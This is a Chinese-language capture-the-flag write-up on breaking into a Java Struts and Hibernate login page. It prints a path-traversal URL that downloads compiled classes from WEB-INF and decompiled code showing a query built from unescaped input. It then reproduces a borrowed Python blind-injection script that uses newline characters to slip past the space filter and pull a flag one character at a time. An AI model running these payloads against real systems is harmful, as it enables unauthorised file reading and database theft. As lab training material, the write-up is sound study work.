掃目錄發現/list,點進去發現要登陸,抓包發現一個請求爲
看到JSESSIONID,得知是java web,所以想辦法讀取配置文件web.xml
發現用了struts過濾器,嘗試讀struts.xml
發現一個看起來和登陸有關的類UserLoginAction,構造payload下載:
http://111.198.29.45:35732/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class
用JD反編譯,截取部分有用的代碼:
public boolean userCheck(User user) {
List<User> userList = this.userService.loginCheck(user.getName(), user.getPassword());
if (userList != null && userList.size() == 1) {
return true;
}
addActionError("Username or password is Wrong, please check!");
return false;
}
但是找不到loginCheck所在的類…於是借鑑了大佬的wp,發現還有個applicationContext.xml
在其中找到類UserServiceImpl:
public List <User> loginCheck(String name, String password) {
name = name.replaceAll(" ", "");
name = name.replaceAll("=", "");
Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
if (password_matcher.find()) {
return this.userDao.loginCheck(name, password);
}
return null;
}
是登陸語句的過濾規則,在UserDaoImpl.class中找到:
public List < User > loginCheck(String name, String password) {
return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");
}
接下來可以寫一個盲註腳本,附大佬腳本
https://xz.aliyun.com/t/2405#toc-27
import requests
s=requests.session()
flag=''
for i in range(1,50):
p=''
for j in range(1,255):
payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
url="http://111.198.29.45:35732/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
r1=s.get(url)
if len(r1.text)>20000 and p!='':
flag+=p
print i,flag
break
p=chr(j)
